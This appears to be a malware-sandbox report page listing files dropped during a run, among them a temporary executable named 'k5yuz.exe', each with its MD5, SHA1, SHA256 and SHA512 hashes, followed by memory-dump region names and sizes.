fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c356f451-13b2-41fc-8d4c-54a293efa6e1
MD5
b6d38f250ccc9003dd70efd3b778117f

SHA1
d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

SHA256
4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

SHA512
67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ce569c42-07bf-442e-b377-8e9695c9383c
MD5
be4d72095faf84233ac17b94744f7084

SHA1
cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

SHA256
b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

SHA512
43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
7a3e9ec84e21dabd54bf131473915585

SHA1
df6e0515511af43422c36434cf83693415dc94f9

SHA256
3c11f53d5d2dc3799de7b9e8f16e5c562b4af6c9492b39e6548ad5ab09e7315d

SHA512
5c1d469e43fe35b4064700b3f67da595461d2270d0183015b6b6c418897c16b1ad49064828a2d3e76f6975d80304c0bdd38c1aefb8a49ab647db66d37fa1d206

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7ISB2KAC\N8Z6EVD0.htm
MD5
a4956484148dd65fd2567a49d3c27709

SHA1
63e9e87f3cac3efea17501199de10703e23cb5ee

SHA256
219bd1e316baa56f52da9c394f6abdff335f594d49f90e88aa99b8fa91a5be48

SHA512
eaf2a49021a3c399b5503a03ee2bd8407def41b701b83ac05da7dbf163a2283342bb91da97ba2ba45267419204ad4058925aa266b3b8e40b7d1217d469544f45

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.tMp
MD5
88acae3e364010e82fb022c29ab69c9d

SHA1
043f08caaf36d317c60977dd9bdaa2be62ed54a0

SHA256
f14c7ba0240be3456164dd63f53dd4bc7eb34bcdb1ac26e98a623edc0390b56b

SHA512
38283522ffc8d6026c6298b3405f4274c833f3bf36d96648c0030d3aacea1a61553cea20ec0307ab6711e77ca5aadb4a7db308ed942434d5c8cf0733a3a4b27c

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.tMp
MD5
88acae3e364010e82fb022c29ab69c9d

SHA1
043f08caaf36d317c60977dd9bdaa2be62ed54a0

SHA256
f14c7ba0240be3456164dd63f53dd4bc7eb34bcdb1ac26e98a623edc0390b56b

SHA512
38283522ffc8d6026c6298b3405f4274c833f3bf36d96648c0030d3aacea1a61553cea20ec0307ab6711e77ca5aadb4a7db308ed942434d5c8cf0733a3a4b27c

Download Submit
C:\Users\Admin\AppData\Local\Temp\k5yuz.exe
MD5
3a44489e428c94ee9a96b81832b17f3c

SHA1
63b8fa8f63ef4f14e346d407823c88c235435866

SHA256
3f0e1c440afaaa9e676c701415d848b6f943d8d3a0436802e835114d993eb80b

SHA512
76abb45a8abbcd157f64ec1141b58a93411c3246a1d969778a87ba2dce7ebfadf2678996bf94a14dcb907eac5c4ce572b3f9fc15c1259c6371d07f3f06121c22

Download Submit
C:\Users\Admin\AppData\Local\Temp\k5yuz.exe
MD5
3a44489e428c94ee9a96b81832b17f3c

SHA1
63b8fa8f63ef4f14e346d407823c88c235435866

SHA256
3f0e1c440afaaa9e676c701415d848b6f943d8d3a0436802e835114d993eb80b

SHA512
76abb45a8abbcd157f64ec1141b58a93411c3246a1d969778a87ba2dce7ebfadf2678996bf94a14dcb907eac5c4ce572b3f9fc15c1259c6371d07f3f06121c22

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\WXER6JZL.txt
MD5
32189bd906b2deb4cd83b2842386d25c

SHA1
9196b2ea8c3735bee7520027a8ab5877d10c6035

SHA256
bc760efd2699677dba9046f64bd7c3401aeb52b91272c27c8128c39c76ef6d3d

SHA512
c75a10021eb13abfe09df5c2afc1b49ccd443e1ccacc1c17ca61208494493c55379873dbf91337a6f600288084e1a0880c4e86ccfa1e7b8e16714c5f1327683d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
cd245c6df282faf6fac7ffa10fa5a4a0

SHA1
e0d4649b9ed2c6a2b47560ea4ba4dc5fae8f7fc6

SHA256
5186338a9c581e2e7aca065baac64b490b15246e49ed4c4fbe030506bdaf9232

SHA512
89c8014496bdce53c6884b7945a025684024088a1a13b0216b49500f1485784ac3f789f86ff4b74fed296db00235287dd7990a6f914ac9b52b51145ad8c04b94

Download Submit
\Users\Admin\AppData\Local\Temp\k5yuz.exe
MD5
3a44489e428c94ee9a96b81832b17f3c

SHA1
63b8fa8f63ef4f14e346d407823c88c235435866

SHA256
3f0e1c440afaaa9e676c701415d848b6f943d8d3a0436802e835114d993eb80b

SHA512
76abb45a8abbcd157f64ec1141b58a93411c3246a1d969778a87ba2dce7ebfadf2678996bf94a14dcb907eac5c4ce572b3f9fc15c1259c6371d07f3f06121c22

Download Submit
\Users\Admin\AppData\Local\Temp\k5yuz.exe
MD5
3a44489e428c94ee9a96b81832b17f3c

SHA1
63b8fa8f63ef4f14e346d407823c88c235435866

SHA256
3f0e1c440afaaa9e676c701415d848b6f943d8d3a0436802e835114d993eb80b

SHA512
76abb45a8abbcd157f64ec1141b58a93411c3246a1d969778a87ba2dce7ebfadf2678996bf94a14dcb907eac5c4ce572b3f9fc15c1259c6371d07f3f06121c22

Download Submit
memory/676-60-0x0000000000000000-mapping.dmp

Download
memory/892-2-0x000007FEFB931000-0x000007FEFB933000-memory.dmp

Filesize
8KB

Download
memory/1108-53-0x0000000000000000-mapping.dmp

Download
memory/1108-61-0x0000000002760000-0x0000000002764000-memory.dmp

Filesize
16KB

Download
memory/1188-6-0x0000000074D91000-0x0000000074D93000-memory.dmp

Filesize
8KB

Download
memory/1188-5-0x0000000000000000-mapping.dmp

Download
memory/1188-22-0x0000000002832000-0x0000000002833000-memory.dmp

Filesize
4KB

Download
memory/1188-20-0x0000000002830000-0x0000000002831000-memory.dmp

Filesize
4KB

Download
memory/1188-9-0x0000000071490000-0x0000000071B7E000-memory.dmp

Filesize
6.9MB

Download
memory/1312-11-0x0000000000000000-mapping.dmp

Download
memory/1328-4-0x0000000000000000-mapping.dmp

Download
memory/1492-7-0x0000000000000000-mapping.dmp

Download
memory/1640-56-0x0000000000000000-mapping.dmp

Download
memory/1640-68-0x0000000002590000-0x0000000002594000-memory.dmp

Filesize
16KB

Download
memory/1656-71-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/1656-70-0x00000000003A0000-0x00000000003DC000-memory.dmp

Filesize
240KB

Download
memory/1656-65-0x0000000000000000-mapping.dmp

Download
memory/1656-67-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/1696-54-0x0000000000000000-mapping.dmp

Download
memory/1868-15-0x0000000001FA0000-0x0000000001FA1000-memory.dmp

Filesize
4KB

Download
memory/1868-25-0x0000000005400000-0x0000000005401000-memory.dmp

Filesize
4KB

Download
memory/1868-43-0x00000000063F0000-0x00000000063F1000-memory.dmp

Filesize
4KB

Download
memory/1868-36-0x0000000006290000-0x0000000006291000-memory.dmp

Filesize
4KB

Download
memory/1868-35-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/1868-34-0x0000000005880000-0x0000000005881000-memory.dmp

Filesize
4KB

Download
memory/1868-29-0x0000000005750000-0x0000000005751000-memory.dmp

Filesize
4KB

Download
memory/1868-10-0x0000000000000000-mapping.dmp

Download
memory/1868-23-0x0000000002610000-0x0000000002611000-memory.dmp

Filesize
4KB

Download
memory/1868-21-0x00000000028F2000-0x00000000028F3000-memory.dmp

Filesize
4KB

Download
memory/1868-19-0x00000000028F0000-0x00000000028F1000-memory.dmp

Filesize
4KB

Download
memory/1868-17-0x0000000004980000-0x0000000004981000-memory.dmp

Filesize
4KB

Download
memory/1868-14-0x0000000071490000-0x0000000071B7E000-memory.dmp

Filesize
6.9MB

Download
memory/1972-3-0x000007FEF7570000-0x000007FEF77EA000-memory.dmp

Filesize
2.5MB

Download
memory/1992-51-0x0000000000000000-mapping.dmp

Download